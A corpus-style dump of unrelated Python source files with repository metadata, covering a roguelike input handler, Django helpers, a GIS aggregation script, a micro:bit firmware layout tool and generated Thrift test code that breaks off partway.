5ea3abe3100127da5d59957fa8e7d512baa17b7f | 9a7b7f90aa62ce52643e2df83d8aef7ba7803afd | /src/input_handlers/inventory_drop_handler.py | f467da4003f1c32e9ad309fed15c3b0a08d53594 | [] | no_license | voidnologo/tcod_roguelike | d82a060a94784a18156fefe105a3e26a540525e9 | 23d806f960134c17ccbd4e6ca5527f35e654df65 | refs/heads/main | 2023-02-28T11:05:52.809161 | 2021-02-07T16:36:38 | 2021-02-07T16:36:38 | 331,168,875 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 336 | py | import actions
from input_handlers.inventory_event_handler import InventoryEventHandler
class InventoryDropHandler(InventoryEventHandler):
"""
Handle dropping an inventory item
"""
TITLE = 'Select an item to drop'
def on_item_selected(self, item):
return actions.DropItemAction(self.engine.player, item)
| [
"(none)"
] | (none) |
e5fc3b96e27fd580d60715aa2a9faae4dfa0113f | 7f7ba9fa96eb7741e3a7956aae439802376099d1 | /excel_sync/db/models/mixins.py | 27dc97215b789f0bf7f1c8a652037d36b68db776 | [
"BSD-3-Clause"
] | permissive | FriedrichK/django-excel-sync | bd34911960fab6580985378da7427f7823163bf7 | 3e649231dcdd26b29278dc2e9563ad0ab67d9f1c | refs/heads/master | 2021-01-02T14:46:34.420031 | 2014-04-21T09:59:47 | 2014-04-21T09:59:47 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,270 | py | from excel_sync.db.models.fields import SpreadsheetMixin
class SpreadsheetModelMixin:
@staticmethod
def import_spreadsheet_data(klass):
source = get_spreadsheet_datasource(klass)
fields_with_spreadsheet_metadata = get_fields_with_spreadsheet_metadata(klass)
field_settings = build_field_settings(fields_with_spreadsheet_metadata)
data_for_rows = source.get_rows(field_settings)
for data_for_row in data_for_rows:
entry = klass(**data_for_row)
entry.save()
def get_spreadsheet_datasource(klass):
return klass._meta.spreadsheet_source
def get_fields_with_spreadsheet_metadata(klass):
all_fields = klass._meta.fields
fields_with_spreadsheet_metadata = []
for field in all_fields:
if(has_spreadsheet_metadata(field)):
fields_with_spreadsheet_metadata.append(field)
return fields_with_spreadsheet_metadata
def has_spreadsheet_metadata(field):
return isinstance(field, SpreadsheetMixin)
def build_field_settings(fields_with_spreadsheet_metadata):
field_settings = []
for field in fields_with_spreadsheet_metadata:
field_setting = field.get_spreadsheet_settings()
field_settings.append(field_setting)
return field_settings
| [
"[email protected]"
] | |
ff93f4c4e03c2723185097e82af8b56b2598c151 | 16be53c2dc4eee5602d3f7a38c599917009fb802 | /account/migrations/0002_remove_profile_address.py | 02e0e499ef82da7cbf16355972f4610131d12c84 | [] | no_license | surajit003/mubango | 35f37fb992782ae168a407922b494c3be0605e00 | 603e13cd07417d200330ca7292d9032af568a0b9 | refs/heads/main | 2023-03-28T07:59:57.967026 | 2021-03-27T09:34:46 | 2021-03-27T09:34:46 | 315,040,701 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 319 | py | # Generated by Django 3.0.4 on 2021-01-12 21:06
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
("account", "0001_initial"),
]
operations = [
migrations.RemoveField(
model_name="profile",
name="address",
),
]
| [
"[email protected]"
] | |
7111f32084156c05493026e38ec44b185622bb09 | 53fab060fa262e5d5026e0807d93c75fb81e67b9 | /backup/user_198/ch73_2019_09_03_19_31_47_647277.py | 33be594abb99268b65cbb1ae31306829a17afa62 | [] | no_license | gabriellaec/desoft-analise-exercicios | b77c6999424c5ce7e44086a12589a0ad43d6adca | 01940ab0897aa6005764fc220b900e4d6161d36b | refs/heads/main | 2023-01-31T17:19:42.050628 | 2020-12-16T05:21:31 | 2020-12-16T05:21:31 | 306,735,108 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 126 | py | def remove_vogais(palavra):
return palavra.replace('a','').replace('e','').replace('i','').replace('o','').replace('u','') | [
"[email protected]"
] | |
2398d673bdef1187105868a48ac3e87d4555d20f | 3c01d7928029e74a19d646f5a40b3bf099b281a7 | /typeshed/stdlib/mimetypes.pyi | 5a3ec91acbcdb71fb39f59656555c7233be0d66e | [
"MIT"
] | permissive | arpancodes/protectsql | f3ced238c103fca72615902a9cb719c44ee2b5ba | 6392bb7a86d1f62b86faf98943a302f7ea3fce4c | refs/heads/main | 2023-08-07T16:33:57.496144 | 2021-09-24T19:44:51 | 2021-09-24T19:44:51 | 409,894,807 | 0 | 1 | MIT | 2021-09-24T19:44:52 | 2021-09-24T08:46:02 | Python | UTF-8 | Python | false | false | 1,554 | pyi | import sys
from _typeshed import StrPath
from typing import IO, Sequence, Tuple
if sys.version_info >= (3, 8):
def guess_type(url: StrPath, strict: bool = ...) -> Tuple[str | None, str | None]: ...
else:
def guess_type(url: str, strict: bool = ...) -> Tuple[str | None, str | None]: ...
def guess_all_extensions(type: str, strict: bool = ...) -> list[str]: ...
def guess_extension(type: str, strict: bool = ...) -> str | None: ...
def init(files: Sequence[str] | None = ...) -> None: ...
def read_mime_types(file: str) -> dict[str, str] | None: ...
def add_type(type: str, ext: str, strict: bool = ...) -> None: ...
inited: bool
knownfiles: list[str]
suffix_map: dict[str, str]
encodings_map: dict[str, str]
types_map: dict[str, str]
common_types: dict[str, str]
class MimeTypes:
suffix_map: dict[str, str]
encodings_map: dict[str, str]
types_map: Tuple[dict[str, str], dict[str, str]]
types_map_inv: Tuple[dict[str, str], dict[str, str]]
def __init__(self, filenames: Tuple[str, ...] = ..., strict: bool = ...) -> None: ...
def guess_extension(self, type: str, strict: bool = ...) -> str | None: ...
def guess_type(self, url: str, strict: bool = ...) -> Tuple[str | None, str | None]: ...
def guess_all_extensions(self, type: str, strict: bool = ...) -> list[str]: ...
def read(self, filename: str, strict: bool = ...) -> None: ...
def readfp(self, fp: IO[str], strict: bool = ...) -> None: ...
if sys.platform == "win32":
def read_windows_registry(self, strict: bool = ...) -> None: ...
| [
"[email protected]"
] | |
b4891a5b540f1bd8e420aa57dab3d7ec38f825b6 | 232d0a99df3ad03ce7811b4e96ebb6982cc0f865 | /aggregate.py | 396c21a0343add8ef7e949e48692f0f5f77f2ad8 | [] | no_license | tomalrussell/aggregation-case-study | 9e6db17e3a43f436dfce8cb84e608cb61b607239 | d23217d94e61d89043baffcfd157883fc474b8ae | refs/heads/master | 2020-06-23T03:46:44.340892 | 2016-11-24T11:23:43 | 2016-11-24T11:23:43 | 74,666,760 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,478 | py | from __future__ import print_function
import argparse
from collections import namedtuple
import fiona
from shapely.geometry import shape
from rtree import index
def proportion_of_a_intersecting_b(a, b):
intersection = a.intersection(b)
return intersection.area / a.area
ShapeWithValue = namedtuple('ShapeWithValue', ['shape', 'value'])
def aggregate(input_file, output_file, reporting_geometry, reporting_initial_value, reporting_attribute, reporting_attribute_type):
input_features = []
idx = index.Index()
with fiona.drivers():
with fiona.open(input_file) as input_src:
for feature in input_src:
s = ShapeWithValue(
shape=shape(feature['geometry']),
value=feature['properties'][reporting_attribute]
)
input_features.append(s)
# Populate R-tree index with bounds of input features
for pos, feature in enumerate(input_features):
idx.insert(pos, feature.shape.bounds)
with fiona.open(reporting_geometry) as reporting_src:
sink_schema = reporting_src.schema.copy()
sink_schema['properties'][reporting_attribute] = reporting_attribute_type
with fiona.open(
output_file, 'w',
crs=reporting_src.crs,
driver="ESRI Shapefile",
schema=sink_schema) as reporting_sink:
for reporting_feature in reporting_src:
reporting_shape = shape(reporting_feature['geometry'])
reporting_value = reporting_initial_value
# look up bbox intersecting features in R-tree
intersecting_features = [input_features[pos] for pos in idx.intersection(reporting_shape.bounds)]
for input_feature in intersecting_features:
# find proportion of input feature that intersects
proportion = proportion_of_a_intersecting_b(input_feature.shape, reporting_shape)
# add that proportion of the attribute_to_report to the reporting_value
reporting_value = reporting_value + proportion * input_feature.value
print(reporting_value)
reporting_feature['properties'][reporting_attribute] = reporting_value
reporting_sink.write(reporting_feature)
def setup_parser():
"""Parse command line arguments
"""
parser = argparse.ArgumentParser(description='Aggregate a value from one geometry to another.')
parser.add_argument('-i', '--input-file',
required=True,
help='Path to the input file, containing the data to be aggregated.')
parser.add_argument('-o', '--output-file',
required=True,
help='Path to the output file.')
parser.add_argument('-rg', '--reporting-geometry',
required=True,
help='Path to the reporting geometry file, containing geometry to be used as output.')
parser.add_argument('-ri', '--reporting-initial-value',
required=True,
help='Initial value for the attribute to output (used if no geometries intersect)')
parser.add_argument('-ra', '--reporting-attribute',
required=True,
help='Attribute name')
parser.add_argument('-rt', '--reporting-attribute-type',
required=True,
choices=['int', 'str', 'float'],
help='Type of value (can be "int", "str" or "float")')
parsed_args = parser.parse_args()
if parsed_args.reporting_attribute_type == 'int':
parsed_args.reporting_initial_value = int(parsed_args.reporting_initial_value)
if parsed_args.reporting_attribute_type == 'str':
parsed_args.reporting_initial_value = str(parsed_args.reporting_initial_value)
if parsed_args.reporting_attribute_type == 'float':
parsed_args.reporting_initial_value = float(parsed_args.reporting_initial_value)
return parsed_args
if __name__ == '__main__':
args = setup_parser()
"""Example usage:
python aggregate.py \
-i data/oa/england_oa_2011_clipped_with_pop.shp \
-o data/grid_with_pop.shp \
-rg data/grid.shp \
-ri 0 -ra pop -rt int
"""
aggregate(
args.input_file,
args.output_file,
args.reporting_geometry,
args.reporting_initial_value,
args.reporting_attribute,
args.reporting_attribute_type
)
| [
"[email protected]"
] | |
ba683fa2671b6bcd12fa5fce3c7356675c5f5a60 | db697271157368eb39ee9d9479d0c6a7eb9d06dd | /virtual/bin/easy_install | f22e90e735bfeae51bc3a727bc7716715ebadcd1 | [
"MIT"
] | permissive | amoskipz/instagram | 5edaf03fd784c44fb325dc9f294fab41acc7bc4c | 120e5ef1213567297689e04d5b8620508ce18fea | refs/heads/master | 2023-04-09T13:09:27.379801 | 2021-04-10T17:29:14 | 2021-04-10T17:29:14 | 352,740,611 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 278 | #!/home/moringa/Desktop/amoz/amosinstagram/virtual/bin/python3
# -*- coding: utf-8 -*-
import re
import sys
from setuptools.command.easy_install import main
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(main())
| [
"[email protected]"
] | ||
0571f647ae3ab197917c302a532b8449f7afe44d | f504253210cec1c4ec6c3ea50a45564db7d6cd7f | /scripts/parse_pyi.py | d4b35524274e7a8a2fb6d2ba5b401434ca6486d5 | [
"MIT"
] | permissive | phil65/PrettyQt | b1150cb4dce982b9b8d62f38f56694959b720a3e | f00500d992d1befb0f2c2ae62fd2a8aafba7fd45 | refs/heads/master | 2023-08-30T21:00:08.905444 | 2023-08-17T12:24:45 | 2023-08-17T12:24:45 | 177,451,205 | 17 | 5 | MIT | 2020-08-15T22:21:18 | 2019-03-24T18:10:21 | Python | UTF-8 | Python | false | false | 1,049 | py | import pathlib
import sys
from typed_ast import ast3
def add_parents(tree):
for node in ast3.walk(tree):
for child in ast3.iter_child_nodes(node):
child.parent = node # type: ignore
def find_enums(tree):
for node in ast3.walk(tree):
if not isinstance(node, ast3.Assign):
continue
if node.type_comment is None:
continue
if "." not in node.type_comment:
continue
if not node.type_comment.startswith("'"):
continue
comment = node.type_comment.strip("'")
mod, cls = comment.rsplit(".", maxsplit=1)
assert len(node.targets) == 1
name = node.targets[0].id # type: ignore
yield (mod, cls, name)
def main():
for filename in sys.argv[1:]:
tree = ast3.parse(pathlib.Path(filename).read_text())
for mod, cls, name in find_enums(tree):
old = f"{mod}.{name}"
new = f"{mod}.{cls}.{name}"
print(f"{old} {new}")
if __name__ == "__main__":
main()
| [
"[email protected]"
] | |
59de5f4d684f1fcbb412201731cec5a17abe4081 | 08f42d68aaea64c986a532b86562365f2a6fe3b5 | /src/addlayouttable.py | 3e32ab12ae34fdcd43ccd0ad5cf36d01a2dfbff6 | [
"MIT"
] | permissive | sos82/micropython-microbit-v2 | da65da0c4ae8a3e2189bb598f75fec43d4628007 | a44573c623a9e935257c8db51a3f0c2e75ea10aa | refs/heads/master | 2023-07-19T07:03:40.101099 | 2021-09-11T15:13:42 | 2021-09-11T15:13:42 | 402,835,132 | 0 | 0 | MIT | 2021-09-11T15:13:43 | 2021-09-03T16:35:34 | null | UTF-8 | Python | false | false | 7,683 | py | #!/usr/bin/env python3
"""
Add a flash layout table to a hex firmware for MicroPython on the micro:bit.
Usage: ./addlayouttable.py <firmware.hex> <firmware.map> [-o <combined.hex>]
Output goes to stdout if no filename is given.
The layout table is a sequence of 16-byte entries. The last entry contains the
header (including magic numbers) and is aligned to the end of a page such that
the final byte of the layout table is the final byte of the page it resides in.
This is so it can be quickly and easily searched for.
The layout table has the following format. All integer values are unsigned and
store little endian.
0x00 0x01 0x02 0x03 0x04 0x05 0x06 0x07 0x08 0x09 0x0a 0x0b 0x0c 0x0d 0x0e 0x0f
ID HT REG_PAGE REG_LEN HASH_DATA
(additional regions)
...
MAGIC1 VERSION TABLE_LEN NUM_REG PSIZE_LOG2 MAGIC2
The values are:
ID - 1 byte - region id for this entry, defined by the region
HT - 1 byte - hash type of the region hash data
REG_PAGE - 2 bytes - starting page number of the region
REG_LEN - 4 bytes - length in bytes of the region
HASH_DATA - 8 bytes - data for the hash of this region
HT=0: hash data is empty
HT=1: hash data contains 8 bytes of verbatim data
HT=2: hash data contains a 4-byte pointer to a string
MAGIC1 - 4 bytes - 0x597F30FE
VERSION - 2 bytes - table version (currently 1)
TABLE_LEN - 2 bytes - length in bytes of the table excluding this header row
NUM_REG - 2 bytes - number of regions
PSIZE_LOG2 - 2 bytes - native page size of the flash, log-2
MAGIC2 - 4 bytes - 0xC1B1D79D
"""
import argparse
import binascii
import struct
import sys
IHEX_TYPE_DATA = 0
IHEX_TYPE_EXT_LIN_ADDR = 4
NRF_PAGE_SIZE_LOG2 = 12
NRF_PAGE_SIZE = 1 << NRF_PAGE_SIZE_LOG2
class FlashLayout:
MAGIC1 = 0x597F30FE
MAGIC2 = 0xC1B1D79D
VERSION = 1
REGION_HASH_NONE = 0
REGION_HASH_DATA = 1
REGION_HASH_PTR = 2
def __init__(self):
self.data = b""
self.num_regions = 0
def add_region(
self, region_id, region_addr, region_len, region_hash_type, region_hash=None
):
# Compute/validate the hash data.
if region_addr % NRF_PAGE_SIZE != 0:
assert 0, region_addr
if region_hash_type == FlashLayout.REGION_HASH_NONE:
assert region_hash is None
region_hash = b"\x00" * 8
elif region_hash_type == FlashLayout.REGION_HASH_DATA:
assert len(region_hash) == 8
elif region_hash_type == FlashLayout.REGION_HASH_PTR:
region_hash = struct.pack("<II", region_hash, 0)
# Increase number of regions.
self.num_regions += 1
# Add the region data.
self.data += struct.pack(
"<BBHI8s",
region_id,
region_hash_type,
region_addr // NRF_PAGE_SIZE,
region_len,
region_hash,
)
def finalise(self):
# Add padding to data to align it to 16 bytes.
if len(self.data) % 16 != 0:
self.data += b"\xff" * 16 - len(self.data) % 16
# Add 16-byte "header" at the end with magic numbers and meta data.
self.data += struct.pack(
"<IHHHHI",
FlashLayout.MAGIC1,
FlashLayout.VERSION,
len(self.data),
self.num_regions,
NRF_PAGE_SIZE_LOG2,
FlashLayout.MAGIC2,
)
def make_ihex_record(addr, type, data):
record = struct.pack(">BHB", len(data), addr & 0xFFFF, type) + data
checksum = (-(sum(record))) & 0xFF
return ":%s%02X" % (str(binascii.hexlify(record), "utf8").upper(), checksum)
def parse_map_file(filename, symbols):
parse_symbols = False
with open(filename) as f:
for line in f:
line = line.strip()
if line == "Linker script and memory map":
parse_symbols = True
elif parse_symbols and line.startswith("0x00"):
line = line.split()
if len(line) >= 2 and line[1] in symbols:
symbols[line[1]] = int(line[0], 16)
def output_firmware(dest, firmware, layout_addr, layout_data):
# Output head of firmware.
for line in firmware[:-2]:
print(line, end="", file=dest)
# Output layout data.
print(
make_ihex_record(
0,
IHEX_TYPE_EXT_LIN_ADDR,
struct.pack(">H", layout_addr >> 16),
),
file=dest,
)
for i in range(0, len(layout_data), 16):
chunk = layout_data[i : min(i + 16, len(layout_data))]
print(
make_ihex_record(layout_addr + i, IHEX_TYPE_DATA, chunk),
file=dest,
)
# Output tail of firmware.
print(firmware[-2], end="", file=dest)
print(firmware[-1], end="", file=dest)
def main():
arg_parser = argparse.ArgumentParser(
description="Add UICR region to hex firmware for the micro:bit."
)
arg_parser.add_argument(
"-o",
"--output",
default=sys.stdout,
type=argparse.FileType("wt"),
help="output file (default is stdout)",
)
arg_parser.add_argument("firmware", nargs=1, help="input MicroPython firmware")
arg_parser.add_argument(
"mapfile",
nargs=1,
help="input map file",
)
args = arg_parser.parse_args()
# Read in the firmware from the given hex file.
with open(args.firmware[0], "rt") as f:
firmware = f.readlines()
# Parse the linker map file, looking for the following symbols.
symbols = {
key: None
for key in [
"_binary_softdevice_bin_start",
"__isr_vector",
"__etext",
"__data_start__",
"__data_end__",
"_fs_start",
"_fs_end",
"microbit_version_string",
]
}
parse_map_file(args.mapfile[0], symbols)
# Get the required symbol addresses.
sd_start = symbols["_binary_softdevice_bin_start"]
sd_end = symbols["__isr_vector"]
mp_start = symbols["__isr_vector"]
data_len = symbols["__data_end__"] - symbols["__data_start__"]
mp_end = symbols["__etext"] + data_len
mp_version = symbols["microbit_version_string"]
fs_start = symbols["_fs_start"]
fs_end = symbols["_fs_end"]
# Make the flash layout information table.
layout = FlashLayout()
layout.add_region(1, sd_start, sd_end - sd_start, FlashLayout.REGION_HASH_NONE)
layout.add_region(
2, mp_start, mp_end - mp_start, FlashLayout.REGION_HASH_PTR, mp_version
)
layout.add_region(3, fs_start, fs_end - fs_start, FlashLayout.REGION_HASH_NONE)
layout.finalise()
# Compute layout address.
layout_addr = (
((mp_end >> NRF_PAGE_SIZE_LOG2) << NRF_PAGE_SIZE_LOG2)
+ NRF_PAGE_SIZE
- len(layout.data)
)
if layout_addr < mp_end:
layout_addr += NRF_PAGE_SIZE
if layout_addr >= fs_start:
print("ERROR: Flash layout information overlaps with filesystem")
sys.exit(1)
# Print information.
if args.output is not sys.stdout:
fmt = "{:13} 0x{:05x}..0x{:05x}"
print(fmt.format("SoftDevice", sd_start, sd_end))
print(fmt.format("MicroPython", mp_start, mp_end))
print(fmt.format("Layout table", layout_addr, layout_addr + len(layout.data)))
print(fmt.format("Filesystem", fs_start, fs_end))
# Output the new firmware as a hex file.
output_firmware(args.output, firmware, layout_addr, layout.data)
if __name__ == "__main__":
main()
| [
"[email protected]"
] | |
af3d10e72f46f60903f229b8c409d1372fd9b5e8 | b282ccdc65f969e45b36630f9008f54d2087b9c1 | /thrift-0.11.0/test/py/gen-py-slots/ThriftTest/ThriftTest.py | 3f67ce151c41cbf8af305c8a581a5e09db97f816 | [
"MIT",
"LicenseRef-scancode-public-domain-disclaimer",
"FSFAP",
"Apache-2.0"
] | permissive | jdencala10/Proyecto-Distribuidos | 36727fb314159393eda86385d8908bb3ae70a549 | 5b34ece54cc9e8240e9f0106ffbf76449fea507d | refs/heads/master | 2020-03-24T02:26:52.556503 | 2018-08-23T07:44:08 | 2018-08-23T07:44:08 | 142,375,884 | 1 | 0 | null | 2018-07-26T04:59:33 | 2018-07-26T02:10:13 | Python | UTF-8 | Python | false | true | 160,877 | py | #
# Autogenerated by Thrift Compiler (0.11.0)
#
# DO NOT EDIT UNLESS YOU ARE SURE THAT YOU KNOW WHAT YOU ARE DOING
#
# options string: py:slots
#
from thrift.Thrift import TType, TMessageType, TFrozenDict, TException, TApplicationException
from thrift.protocol.TProtocol import TProtocolException
from thrift.TRecursive import fix_spec
import sys
import logging
from .ttypes import *
from thrift.Thrift import TProcessor
from thrift.transport import TTransport
all_structs = []
class Iface(object):
def testVoid(self):
"""
Prints "testVoid()" and returns nothing.
"""
pass
def testString(self, thing):
"""
Prints 'testString("%s")' with thing as '%s'
@param string thing - the string to print
@return string - returns the string 'thing'
Parameters:
- thing
"""
pass
def testBool(self, thing):
"""
Prints 'testBool("%s")' where '%s' with thing as 'true' or 'false'
@param bool thing - the bool data to print
@return bool - returns the bool 'thing'
Parameters:
- thing
"""
pass
def testByte(self, thing):
"""
Prints 'testByte("%d")' with thing as '%d'
The types i8 and byte are synonyms, use of i8 is encouraged, byte still exists for the sake of compatibility.
@param byte thing - the i8/byte to print
@return i8 - returns the i8/byte 'thing'
Parameters:
- thing
"""
pass
def testI32(self, thing):
"""
Prints 'testI32("%d")' with thing as '%d'
@param i32 thing - the i32 to print
@return i32 - returns the i32 'thing'
Parameters:
- thing
"""
pass
def testI64(self, thing):
"""
Prints 'testI64("%d")' with thing as '%d'
@param i64 thing - the i64 to print
@return i64 - returns the i64 'thing'
Parameters:
- thing
"""
pass
def testDouble(self, thing):
"""
Prints 'testDouble("%f")' with thing as '%f'
@param double thing - the double to print
@return double - returns the double 'thing'
Parameters:
- thing
"""
pass
def testBinary(self, thing):
"""
Prints 'testBinary("%s")' where '%s' is a hex-formatted string of thing's data
@param binary thing - the binary data to print
@return binary - returns the binary 'thing'
Parameters:
- thing
"""
pass
def testStruct(self, thing):
"""
Prints 'testStruct("{%s}")' where thing has been formatted into a string of comma separated values
@param Xtruct thing - the Xtruct to print
@return Xtruct - returns the Xtruct 'thing'
Parameters:
- thing
"""
pass
def testNest(self, thing):
"""
Prints 'testNest("{%s}")' where thing has been formatted into a string of the nested struct
@param Xtruct2 thing - the Xtruct2 to print
@return Xtruct2 - returns the Xtruct2 'thing'
Parameters:
- thing
"""
pass
def testMap(self, thing):
"""
Prints 'testMap("{%s")' where thing has been formatted into a string of 'key => value' pairs
separated by commas and new lines
@param map<i32,i32> thing - the map<i32,i32> to print
@return map<i32,i32> - returns the map<i32,i32> 'thing'
Parameters:
- thing
"""
pass
def testStringMap(self, thing):
"""
Prints 'testStringMap("{%s}")' where thing has been formatted into a string of 'key => value' pairs
separated by commas and new lines
@param map<string,string> thing - the map<string,string> to print
@return map<string,string> - returns the map<string,string> 'thing'
Parameters:
- thing
"""
pass
def testSet(self, thing):
"""
Prints 'testSet("{%s}")' where thing has been formatted into a string of values
separated by commas and new lines
@param set<i32> thing - the set<i32> to print
@return set<i32> - returns the set<i32> 'thing'
Parameters:
- thing
"""
pass
def testList(self, thing):
"""
Prints 'testList("{%s}")' where thing has been formatted into a string of values
separated by commas and new lines
@param list<i32> thing - the list<i32> to print
@return list<i32> - returns the list<i32> 'thing'
Parameters:
- thing
"""
pass
def testEnum(self, thing):
"""
Prints 'testEnum("%d")' where thing has been formatted into it's numeric value
@param Numberz thing - the Numberz to print
@return Numberz - returns the Numberz 'thing'
Parameters:
- thing
"""
pass
def testTypedef(self, thing):
"""
Prints 'testTypedef("%d")' with thing as '%d'
@param UserId thing - the UserId to print
@return UserId - returns the UserId 'thing'
Parameters:
- thing
"""
pass
def testMapMap(self, hello):
"""
Prints 'testMapMap("%d")' with hello as '%d'
@param i32 hello - the i32 to print
@return map<i32,map<i32,i32>> - returns a dictionary with these values:
{-4 => {-4 => -4, -3 => -3, -2 => -2, -1 => -1, }, 4 => {1 => 1, 2 => 2, 3 => 3, 4 => 4, }, }
Parameters:
- hello
"""
pass
def testInsanity(self, argument):
"""
So you think you've got this all worked, out eh?
Creates a the returned map with these values and prints it out:
{ 1 => { 2 => argument,
3 => argument,
},
2 => { 6 => <empty Insanity struct>, },
}
@return map<UserId, map<Numberz,Insanity>> - a map with the above values
Parameters:
- argument
"""
pass
def testMulti(self, arg0, arg1, arg2, arg3, arg4, arg5):
"""
Prints 'testMulti()'
@param i8 arg0 -
@param i32 arg1 -
@param i64 arg2 -
@param map<i16, string> arg3 -
@param Numberz arg4 -
@param UserId arg5 -
@return Xtruct - returns an Xtruct with string_thing = "Hello2, byte_thing = arg0, i32_thing = arg1
and i64_thing = arg2
Parameters:
- arg0
- arg1
- arg2
- arg3
- arg4
- arg5
"""
pass
def testException(self, arg):
"""
Print 'testException(%s)' with arg as '%s'
@param string arg - a string indication what type of exception to throw
if arg == "Xception" throw Xception with errorCode = 1001 and message = arg
elsen if arg == "TException" throw TException
else do not throw anything
Parameters:
- arg
"""
pass
def testMultiException(self, arg0, arg1):
"""
Print 'testMultiException(%s, %s)' with arg0 as '%s' and arg1 as '%s'
@param string arg - a string indication what type of exception to throw
if arg0 == "Xception" throw Xception with errorCode = 1001 and message = "This is an Xception"
elsen if arg0 == "Xception2" throw Xception2 with errorCode = 2002 and struct_thing.string_thing = "This is an Xception2"
else do not throw anything
@return Xtruct - an Xtruct with string_thing = arg1
Parameters:
- arg0
- arg1
"""
pass
def testOneway(self, secondsToSleep):
"""
Print 'testOneway(%d): Sleeping...' with secondsToSleep as '%d'
sleep 'secondsToSleep'
Print 'testOneway(%d): done sleeping!' with secondsToSleep as '%d'
@param i32 secondsToSleep - the number of seconds to sleep
Parameters:
- secondsToSleep
"""
pass
class Client(Iface):
def __init__(self, iprot, oprot=None):
self._iprot = self._oprot = iprot
if oprot is not None:
self._oprot = oprot
self._seqid = 0
def testVoid(self):
"""
Prints "testVoid()" and returns nothing.
"""
self.send_testVoid()
self.recv_testVoid()
def send_testVoid(self):
self._oprot.writeMessageBegin('testVoid', TMessageType.CALL, self._seqid)
args = testVoid_args()
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_testVoid(self):
iprot = self._iprot
(fname, mtype, rseqid) = iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(iprot)
iprot.readMessageEnd()
raise x
result = testVoid_result()
result.read(iprot)
iprot.readMessageEnd()
return
def testString(self, thing):
"""
Prints 'testString("%s")' with thing as '%s'
@param string thing - the string to print
@return string - returns the string 'thing'
Parameters:
- thing
"""
self.send_testString(thing)
return self.recv_testString()
def send_testString(self, thing):
self._oprot.writeMessageBegin('testString', TMessageType.CALL, self._seqid)
args = testString_args()
args.thing = thing
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_testString(self):
iprot = self._iprot
(fname, mtype, rseqid) = iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(iprot)
iprot.readMessageEnd()
raise x
result = testString_result()
result.read(iprot)
iprot.readMessageEnd()
if result.success is not None:
return result.success
raise TApplicationException(TApplicationException.MISSING_RESULT, "testString failed: unknown result")
def testBool(self, thing):
"""
Prints 'testBool("%s")' where '%s' with thing as 'true' or 'false'
@param bool thing - the bool data to print
@return bool - returns the bool 'thing'
Parameters:
- thing
"""
self.send_testBool(thing)
return self.recv_testBool()
def send_testBool(self, thing):
self._oprot.writeMessageBegin('testBool', TMessageType.CALL, self._seqid)
args = testBool_args()
args.thing = thing
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_testBool(self):
iprot = self._iprot
(fname, mtype, rseqid) = iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(iprot)
iprot.readMessageEnd()
raise x
result = testBool_result()
result.read(iprot)
iprot.readMessageEnd()
if result.success is not None:
return result.success
raise TApplicationException(TApplicationException.MISSING_RESULT, "testBool failed: unknown result")
def testByte(self, thing):
"""
Prints 'testByte("%d")' with thing as '%d'
The types i8 and byte are synonyms, use of i8 is encouraged, byte still exists for the sake of compatibility.
@param byte thing - the i8/byte to print
@return i8 - returns the i8/byte 'thing'
Parameters:
- thing
"""
self.send_testByte(thing)
return self.recv_testByte()
def send_testByte(self, thing):
self._oprot.writeMessageBegin('testByte', TMessageType.CALL, self._seqid)
args = testByte_args()
args.thing = thing
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_testByte(self):
iprot = self._iprot
(fname, mtype, rseqid) = iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(iprot)
iprot.readMessageEnd()
raise x
result = testByte_result()
result.read(iprot)
iprot.readMessageEnd()
if result.success is not None:
return result.success
raise TApplicationException(TApplicationException.MISSING_RESULT, "testByte failed: unknown result")
def testI32(self, thing):
"""
Prints 'testI32("%d")' with thing as '%d'
@param i32 thing - the i32 to print
@return i32 - returns the i32 'thing'
Parameters:
- thing
"""
self.send_testI32(thing)
return self.recv_testI32()
def send_testI32(self, thing):
self._oprot.writeMessageBegin('testI32', TMessageType.CALL, self._seqid)
args = testI32_args()
args.thing = thing
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_testI32(self):
iprot = self._iprot
(fname, mtype, rseqid) = iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(iprot)
iprot.readMessageEnd()
raise x
result = testI32_result()
result.read(iprot)
iprot.readMessageEnd()
if result.success is not None:
return result.success
raise TApplicationException(TApplicationException.MISSING_RESULT, "testI32 failed: unknown result")
def testI64(self, thing):
"""
Prints 'testI64("%d")' with thing as '%d'
@param i64 thing - the i64 to print
@return i64 - returns the i64 'thing'
Parameters:
- thing
"""
self.send_testI64(thing)
return self.recv_testI64()
def send_testI64(self, thing):
self._oprot.writeMessageBegin('testI64', TMessageType.CALL, self._seqid)
args = testI64_args()
args.thing = thing
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_testI64(self):
iprot = self._iprot
(fname, mtype, rseqid) = iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(iprot)
iprot.readMessageEnd()
raise x
result = testI64_result()
result.read(iprot)
iprot.readMessageEnd()
if result.success is not None:
return result.success
raise TApplicationException(TApplicationException.MISSING_RESULT, "testI64 failed: unknown result")
def testDouble(self, thing):
"""
Prints 'testDouble("%f")' with thing as '%f'
@param double thing - the double to print
@return double - returns the double 'thing'
Parameters:
- thing
"""
self.send_testDouble(thing)
return self.recv_testDouble()
def send_testDouble(self, thing):
self._oprot.writeMessageBegin('testDouble', TMessageType.CALL, self._seqid)
